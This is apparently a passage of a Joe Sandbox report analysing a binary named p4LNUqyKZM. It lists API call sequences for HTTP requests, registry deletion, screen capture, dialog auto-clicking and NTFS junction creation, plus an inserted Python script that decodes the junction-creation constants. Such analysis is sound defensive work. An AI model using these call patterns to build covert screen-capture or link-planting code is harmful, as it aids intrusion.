                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 009FC4C3
                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 009FC4D7
                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 009FC4F0
                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 009FC533
                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 009FC549
                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009FC554
                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009FC584
                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 009FC5DC
                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 009FC5F0
                        • InternetCloseHandle.WININET(00000000), ref: 009FC5FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                        • String ID:
                        • API String ID: 3800310941-3916222277
                        • Opcode ID: fe2d3f8453470980b1919ae4b9dca7311e59746fc061c510e2be41e7f0ad22ee
                        • Instruction ID: 32d37b9c6c46165efe6514c14b262a84ad5f2cbecbc4c76b1642f188a949e90f
                        • Opcode Fuzzy Hash: fe2d3f8453470980b1919ae4b9dca7311e59746fc061c510e2be41e7f0ad22ee
                        • Instruction Fuzzy Hash: BC5159B154430DBFDB21DFA0CA88ABB7BBCFB08754F04841AFA4596250DB74E945DBA0
                        APIs
                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00A18592
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00A185A2
                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00A185AD
                        • CloseHandle.KERNEL32(00000000), ref: 00A185BA
                        • GlobalLock.KERNEL32(00000000), ref: 00A185C8
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00A185D7
                        • GlobalUnlock.KERNEL32(00000000), ref: 00A185E0
                        • CloseHandle.KERNEL32(00000000), ref: 00A185E7
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00A185F8
                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00A1FC38,?), ref: 00A18611
                        • GlobalFree.KERNEL32(00000000), ref: 00A18621
                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 00A18641
                        • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00A18671
                        • DeleteObject.GDI32(00000000), ref: 00A18699
                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A186AF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                        • String ID:
                        • API String ID: 3840717409-0
                        • Opcode ID: a6a042a4681765429c23574eee500d7cb789e59addf4451b90848477d319d7ac
                        • Instruction ID: 13a71b7f46799832af5cf0a4d23f399fd326185a6909ddb5b41a7f753f9a0458
                        • Opcode Fuzzy Hash: a6a042a4681765429c23574eee500d7cb789e59addf4451b90848477d319d7ac
                        • Instruction Fuzzy Hash: 6E412975640204BFDB11DFA5CC48EEA7BBDEF89761F108058F915EB260DB349942CB60
                        APIs
                        • VariantInit.OLEAUT32(00000000), ref: 009F1502
                        • VariantCopy.OLEAUT32(?,?), ref: 009F150B
                        • VariantClear.OLEAUT32(?), ref: 009F1517
                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 009F15FB
                        • VarR8FromDec.OLEAUT32(?,?), ref: 009F1657
                        • VariantInit.OLEAUT32(?), ref: 009F1708
                        • SysFreeString.OLEAUT32(?), ref: 009F178C
                        • VariantClear.OLEAUT32(?), ref: 009F17D8
                        • VariantClear.OLEAUT32(?), ref: 009F17E7
                        • VariantInit.OLEAUT32(00000000), ref: 009F1823
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                        • API String ID: 1234038744-3931177956
                        • Opcode ID: 457d8f919a559514232bca71dd0de407e2ddacf0268e2c38d97df252424457d3
                        • Instruction ID: 680e6635f9b96e37847236bd4dd588cfce770bf9a7184c2095f8532fab5e4fbb
                        • Opcode Fuzzy Hash: 457d8f919a559514232bca71dd0de407e2ddacf0268e2c38d97df252424457d3
                        • Instruction Fuzzy Hash: 90D1F031A04119EBDF04AF65E884BBDB7B6BF84700F148456FA46AB680DB34DC41DBE1
                        APIs
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                          • Part of subcall function 00A0C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A0B6AE,?,?), ref: 00A0C9B5
                          • Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0C9F1
                          • Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0CA68
                          • Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0CA9E
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A0B6F4
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A0B772
                        • RegDeleteValueW.ADVAPI32(?,?), ref: 00A0B80A
                        • RegCloseKey.ADVAPI32(?), ref: 00A0B87E
                        • RegCloseKey.ADVAPI32(?), ref: 00A0B89C
                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00A0B8F2
                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A0B904
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A0B922
                        • FreeLibrary.KERNEL32(00000000), ref: 00A0B983
                        • RegCloseKey.ADVAPI32(00000000), ref: 00A0B994
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                        • String ID: RegDeleteKeyExW$advapi32.dll
                        • API String ID: 146587525-4033151799
                        • Opcode ID: b47834a187a79b69e14ebab38fb8e0af2faa30dac717f94934f034e8aea782e6
                        • Instruction ID: a1e8665b3091694670089d61fcf8b32fffeac5c967a36f1b2475cf32d76e1f53
                        • Opcode Fuzzy Hash: b47834a187a79b69e14ebab38fb8e0af2faa30dac717f94934f034e8aea782e6
                        • Instruction Fuzzy Hash: 7AC19B30218205AFD710DF24D594F2ABBE5BF84358F14859CF59A8B3A2CB71EC46CBA1
                        APIs
                        • GetDC.USER32(00000000), ref: 00A025D8
                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00A025E8
                        • CreateCompatibleDC.GDI32(?), ref: 00A025F4
                        • SelectObject.GDI32(00000000,?), ref: 00A02601
                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00A0266D
                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00A026AC
                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00A026D0
                        • SelectObject.GDI32(?,?), ref: 00A026D8
                        • DeleteObject.GDI32(?), ref: 00A026E1
                        • DeleteDC.GDI32(?), ref: 00A026E8
                        • ReleaseDC.USER32(00000000,?), ref: 00A026F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                        • String ID: (
                        • API String ID: 2598888154-3887548279
                        • Opcode ID: 52e8e536bb3555b06d71f351a6fb3b2edcd82de5d50c85f0d72c2db24bf39c36
                        • Instruction ID: 4c4a628ea9b7042192d51e11704f1b6dea1892a8458bdc97997c443dd9968cee
                        • Opcode Fuzzy Hash: 52e8e536bb3555b06d71f351a6fb3b2edcd82de5d50c85f0d72c2db24bf39c36
                        • Instruction Fuzzy Hash: DE61E275D00219EFCF14CFE8D988AAEBBB6FF48310F208529E955A7250E771A941CF50
                        APIs
                        • ___free_lconv_mon.LIBCMT ref: 009BDAA1
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD659
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD66B
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD67D
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD68F
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD6A1
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD6B3
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD6C5
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD6D7
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD6E9
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD6FB
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD70D
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD71F
                          • Part of subcall function 009BD63C: _free.LIBCMT ref: 009BD731
                        • _free.LIBCMT ref: 009BDA96
                          • Part of subcall function 009B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000), ref: 009B29DE
                          • Part of subcall function 009B29C8: GetLastError.KERNEL32(00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000,00000000), ref: 009B29F0
                        • _free.LIBCMT ref: 009BDAB8
                        • _free.LIBCMT ref: 009BDACD
                        • _free.LIBCMT ref: 009BDAD8
                        • _free.LIBCMT ref: 009BDAFA
                        • _free.LIBCMT ref: 009BDB0D
                        • _free.LIBCMT ref: 009BDB1B
                        • _free.LIBCMT ref: 009BDB26
                        • _free.LIBCMT ref: 009BDB5E
                        • _free.LIBCMT ref: 009BDB65
                        • _free.LIBCMT ref: 009BDB82
                        • _free.LIBCMT ref: 009BDB9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                        • String ID:
                        • API String ID: 161543041-0
                        • Opcode ID: a317ce12611cf11754fb6e57a495fecab39fe389f34513ed2e12ab850713c4e2
                        • Instruction ID: 30ec507caf4286e6a812f6faa8bf419d3f154f90d269ce75b92ea83dcb285219
                        • Opcode Fuzzy Hash: a317ce12611cf11754fb6e57a495fecab39fe389f34513ed2e12ab850713c4e2
                        • Instruction Fuzzy Hash: 72312831606605AFEB21AB79EA45BDAB7EDFF40330F154829E449D7191EF31ED808B24
                        APIs
                        • GetClassNameW.USER32(?,?,00000100), ref: 009E369C
                        • _wcslen.LIBCMT ref: 009E36A7
                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 009E3797
                        • GetClassNameW.USER32(?,?,00000400), ref: 009E380C
                        • GetDlgCtrlID.USER32(?), ref: 009E385D
                        • GetWindowRect.USER32(?,?), ref: 009E3882
                        • GetParent.USER32(?), ref: 009E38A0
                        • ScreenToClient.USER32(00000000), ref: 009E38A7
                        • GetClassNameW.USER32(?,?,00000100), ref: 009E3921
                        • GetWindowTextW.USER32(?,?,00000400), ref: 009E395D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                        • String ID: %s%u
                        • API String ID: 4010501982-679674701
                        • Opcode ID: 69b3520d5898499c3210b86e7a1ad2ce2e8ec701888e630b58455f1618aac3e6
                        • Instruction ID: ac6b6350fa0353cd7f3029b71a034a40ff210fa460c7a078e45cf53fcbb8de42
                        • Opcode Fuzzy Hash: 69b3520d5898499c3210b86e7a1ad2ce2e8ec701888e630b58455f1618aac3e6
                        • Instruction Fuzzy Hash: 3A91A071204646EFD71ADF66C889BAAB7A8FF44350F00C529F9A9C3191DB30EE45CB91
                        APIs
                        • GetClassNameW.USER32(?,?,00000400), ref: 009E4994
                        • GetWindowTextW.USER32(?,?,00000400), ref: 009E49DA
                        • _wcslen.LIBCMT ref: 009E49EB
                        • CharUpperBuffW.USER32(?,00000000), ref: 009E49F7
                        • _wcsstr.LIBVCRUNTIME ref: 009E4A2C
                        • GetClassNameW.USER32(00000018,?,00000400), ref: 009E4A64
                        • GetWindowTextW.USER32(?,?,00000400), ref: 009E4A9D
                        • GetClassNameW.USER32(00000018,?,00000400), ref: 009E4AE6
                        • GetClassNameW.USER32(?,?,00000400), ref: 009E4B20
                        • GetWindowRect.USER32(?,?), ref: 009E4B8B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                        • String ID: ThumbnailClass
                        • API String ID: 1311036022-1241985126
                        • Opcode ID: 2ee9fa015cb92a49bb2446fcb8470ff7d200352234872dbcdede52d914476d5f
                        • Instruction ID: d9cf090dc9a01967350dce8eaa3b0c120a16262f2536d0d4a5665ac4becef344
                        • Opcode Fuzzy Hash: 2ee9fa015cb92a49bb2446fcb8470ff7d200352234872dbcdede52d914476d5f
                        • Instruction Fuzzy Hash: CA91ED310083459FDB06CF16C885BAA77ECFF84324F088469FD859A196EB34ED46CBA1
                        APIs
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00A0CC64
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00A0CC8D
                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A0CD48
                          • Part of subcall function 00A0CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00A0CCAA
                          • Part of subcall function 00A0CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00A0CCBD
                          • Part of subcall function 00A0CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A0CCCF
                          • Part of subcall function 00A0CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A0CD05
                          • Part of subcall function 00A0CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00A0CD28
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A0CCF3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                        • String ID: RegDeleteKeyExW$advapi32.dll
                        • API String ID: 2734957052-4033151799
                        • Opcode ID: fa36f555cef2d3761ad55585947289892d9ccbdf7a30991991d1c78f30ec6858
                        • Instruction ID: 09200a48c1ae507b35f717ebc0c67e0cefd250f035aa41f6a8fa759bc9503a03
                        • Opcode Fuzzy Hash: fa36f555cef2d3761ad55585947289892d9ccbdf7a30991991d1c78f30ec6858
                        • Instruction Fuzzy Hash: 6931607194112DBBD720CB94EC88EFFBB7CEF45760F004265A905E3190D7349E469AA0
                        APIs
                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009F3D40
                        • _wcslen.LIBCMT ref: 009F3D6D
                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 009F3D9D
                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 009F3DBE
                        • RemoveDirectoryW.KERNEL32(?), ref: 009F3DCE
                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 009F3E55
                        • CloseHandle.KERNEL32(00000000), ref: 009F3E60
                        • CloseHandle.KERNEL32(00000000), ref: 009F3E6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                        • String ID: :$\$\??\%s
                        • API String ID: 1149970189-3457252023
                        • Opcode ID: 3b5bb0d1b18dfdd2b203b8fd284ee1b3517eb4ebbdd3462030a43f69242c3b62
                        • Instruction ID: 4f963ac921f70756502b45fb12b67b205c3c2b0c1134f0c336227e79dcf82015
                        • Opcode Fuzzy Hash: 3b5bb0d1b18dfdd2b203b8fd284ee1b3517eb4ebbdd3462030a43f69242c3b62
                        • Instruction Fuzzy Hash: FC31CF72940219ABDB20DBA0DC49FEF77BCEF89750F1080A5FA09D60A0EB7497458B64
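                        Added example, not part of the Joe Sandbox report or of the analysed binary: a decoder for the raw constants in the CreateFileW and DeviceIoControl references above (desired access 40000000, creation disposition 00000003, flags 02200000, control code 000900A4). The names and the CTL_CODE bit layout are the Windows SDK ones; only the small lookup tables and the "verdict" heuristic are assumptions of this example. Decoded, the pair is an OPEN_EXISTING handle with FILE_FLAG_BACKUP_SEMANTICS|FILE_FLAG_OPEN_REPARSE_POINT followed by FSCTL_SET_REPARSE_POINT, which together with the "\??\%s" string (NT-native prefix for a reparse substitute name) is how a junction-style link is created on NTFS.

```python
# Added example (not part of the Joe Sandbox report): decode the raw constants
# the listing shows for CreateFileW(..., 40000000, 00000000, 00000000, 00000003,
# 02200000, ...) and DeviceIoControl(..., 000900A4, ...). Constant values and
# the CTL_CODE layout are from the Windows SDK (winioctl.h / winnt.h); the
# lookup tables below are deliberately small (assumption: extend as needed).

# CTL_CODE(DeviceType, Function, Method, Access) =
#   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
DEVICE_TYPES = {0x0009: "FILE_DEVICE_FILE_SYSTEM"}
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
           2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
          2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}

# (device type, function number) -> FSCTL name, from winioctl.h
KNOWN_FSCTLS = {
    (0x9, 41): "FSCTL_SET_REPARSE_POINT",
    (0x9, 42): "FSCTL_GET_REPARSE_POINT",
    (0x9, 43): "FSCTL_DELETE_REPARSE_POINT",
}

# CreateFileW dwDesiredAccess / dwCreationDisposition / dwFlagsAndAttributes
ACCESS_RIGHTS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                 0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x00000080: "FILE_ATTRIBUTE_NORMAL",
              0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
              0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
              0x40000000: "FILE_FLAG_OVERLAPPED",
              0x80000000: "FILE_FLAG_WRITE_THROUGH"}


def decode_ioctl(code):
    """Split a DeviceIoControl control code into its CTL_CODE fields."""
    device = code >> 16
    function = (code >> 2) & 0xFFF
    return {
        "device": DEVICE_TYPES.get(device, "0x%X" % device),
        "function": function,
        "method": METHODS[code & 0x3],
        "access": ACCESS[(code >> 14) & 0x3],
        "name": KNOWN_FSCTLS.get((device, function), "unknown"),
    }


def decode_bits(value, table):
    """Names of every known bit set in value, lowest bit first; leftover bits as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    known = sum(bit for bit in table if value & bit)
    rest = value & ~known
    if rest:
        names.append("0x%08X" % rest)
    return names


def describe_reparse_sequence(desired_access, disposition, flags, ioctl):
    """Summarise a CreateFileW + DeviceIoControl pair as seen in the listing."""
    info = decode_ioctl(ioctl)
    parts = [
        "CreateFileW: %s, %s, %s" % (
            "|".join(decode_bits(desired_access, ACCESS_RIGHTS)),
            DISPOSITIONS.get(disposition, str(disposition)),
            "|".join(decode_bits(flags, FILE_FLAGS))),
        "DeviceIoControl: %s (%s, function %d, %s, %s)" % (
            info["name"], info["device"], info["function"],
            info["method"], info["access"]),
    ]
    if (info["name"] == "FSCTL_SET_REPARSE_POINT"
            and flags & 0x00200000 and flags & 0x02000000):
        # Heuristic (assumption of this example): opening an existing directory
        # with BACKUP_SEMANTICS|OPEN_REPARSE_POINT and then setting a reparse
        # point is the junction/symlink creation pattern; the substitute name
        # carries an NT-native prefix, matching the "\??\%s" format string.
        parts.append("verdict: sets a reparse point on an existing directory "
                     "(junction-style link creation)")
    return parts


if __name__ == "__main__":
    for line in describe_reparse_sequence(0x40000000, 3, 0x02200000, 0x000900A4):
        print(line)
```

                        Running the block prints the decoded CreateFileW arguments, the FSCTL name with its device/function/method/access fields, and the verdict line; feed it other (access, disposition, flags, ioctl) tuples from a listing to decode them the same way.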
                        APIs
                        • timeGetTime.WINMM ref: 009EE6B4
                          • Part of subcall function 0099E551: timeGetTime.WINMM(?,?,009EE6D4), ref: 0099E555
                        • Sleep.KERNEL32(0000000A), ref: 009EE6E1
                        • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 009EE705
                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 009EE727
                        • SetActiveWindow.USER32 ref: 009EE746
                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009EE754
                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 009EE773
                        • Sleep.KERNEL32(000000FA), ref: 009EE77E
                        • IsWindow.USER32 ref: 009EE78A
                        • EndDialog.USER32(00000000), ref: 009EE79B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                        • String ID: BUTTON
                        • API String ID: 1194449130-3405671355
                        • Opcode ID: 4b1e03946bb45c43720d473f67c9f6c1df30f699a61b5cd0b5ffc6d15a3ce8fe
                        • Instruction ID: 4eaff46b1ed4e9f13dfe662e866520048c55eeee75e634979631e1d819b6d0c7
